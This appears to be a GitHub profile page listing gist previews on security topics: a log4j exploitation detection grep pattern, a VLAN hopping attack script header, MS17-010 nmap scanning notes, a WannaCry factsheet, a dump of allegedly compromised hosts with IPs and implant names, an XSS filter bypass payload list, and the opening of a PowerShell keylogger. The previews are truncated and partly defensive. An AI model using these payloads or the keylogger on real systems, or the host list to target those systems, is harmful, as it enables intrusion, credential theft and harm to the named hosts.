Skip to content

Instantly share code, notes, and snippets.

View airborne1's full-sized avatar

airborne1

11 followers · 42 following
  • Milan
View GitHub Profile
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active October 4, 2025 08:06
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@baiwfg2
baiwfg2 / it-ebooks.md
Last active March 16, 2026 09:40
Download ebooks as you want
@mgeeky
mgeeky / VLANHopperDTP.py
Last active February 5, 2026 15:34
VLAN Hopping via DTP Trunk (Switch) Spoofing exploit - script automating full VLAN Hopping attack, from DTP detection to VLAN Hop with DHCP lease request.
#!/usr/bin/python
#
# This script is performing DTP Trunk mode detection and VLAN Hopping
# attack automatically, running sniffer afterwards to collect any other
# VLAN available. To be launched only in Unix/Linux environment as the
# script utilizes following applications:
# - 8021q.ko
# - vconfig
# - ifconfig / ip / route
@Neo23x0
Neo23x0 / nmap-cmdline
Last active March 19, 2020 17:10
Nmap Scan Params for CVE-2017-0143 MS17-010 Scanning
# Scan for CVE-2017-0143 MS17-010
# The vulnerability used by WannaCry Ransomware
#
# 1. Use @calderpwn's script
# http://seclists.org/nmap-dev/2017/q2/79
#
# 2. Save it to Nmap NSE script directory
# Linux - /usr/share/nmap/scripts/ or /usr/local/share/nmap/scripts/
# OSX - /opt/local/share/nmap/scripts/
#
@rain-1
rain-1 / Wannacrypt0r-FACTSHEET.md
Last active May 14, 2025 19:15 — forked from Epivalent/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

anonymous
anonymous / dump.csv
Created April 8, 2017 21:24
Parsed out compromised hosts from #ShadowBrokers
ID Host IP Address Year Month Day Implant Version OS
PITCHIMPAIR ns1.youngdong.ac.kr 202.30.58.5 1969 12 31 INCISION 1.1.2.1 hppa2.0w-hp-hpux11.00
INTONATION tx.micro.net.pk 203.135.2.194 2000 8 17 JACKLADDER 2.0 sparc-sun-solaris2.7
INTONATION hakuba.janis.or.jp 210.232.42.3 2000 8 22 JACKLADDER 2.0 sparc-sun-solaris2.6
INTONATION mail.interq.or.jp 210.157.0.87 2000 8 24 JACKLADDER 2.0 sparc-sun-solaris2.6
INTONATION mx1.freemail.ne.jp 210.235.164.21 2000 8 28 JACKLADDER ? i386-pc-solaris2.7
INTONATION webnetra.entelnet.bo 166.114.10.28 2000 8 30 JACKLADDER 2.0 sparc-sun-solaris2.6
INTONATION opcwdns.opcw.nl 195.193.177.150 2000 9 6 JACKLADDER 2.0 sparc-sun-solaris2.6
INTONATION rayo.pereira.multi.net.co 206.49.164.2 2000 9 20 JACKLADDER 2.0 sparc-sun-solaris2.6
INTONATION most.cob.net.ba 195.222.48.5 2000 9 21 JACKLADDER 2.0 sparc-sun-solaris2.6
@mubix
mubix / infosec_newbie.md
Last active December 20, 2025 04:31
How to start in Infosec
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active December 5, 2025 11:24
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@dasgoll
dasgoll / gist:7ca1c059dd3b3fbc7277
Created December 11, 2015 16:44
Simple Windows Keylogger using PowerShell
#requires -Version 2
function Start-KeyLogger($Path="$env:temp\keylogger.txt")
{
# Signatures for API Calls
$signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
@atcuno
atcuno / gist:3425484ac5cce5298932
Last active March 11, 2026 14:30
HowTo: Privacy & Security Conscious Browsing

The purpose of this document is to make recommendations on how to browse in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.

I welcome contributions and comments on the information contained. Please see the How to Contribute section for information on contributing your own knowledge.

Table of Contents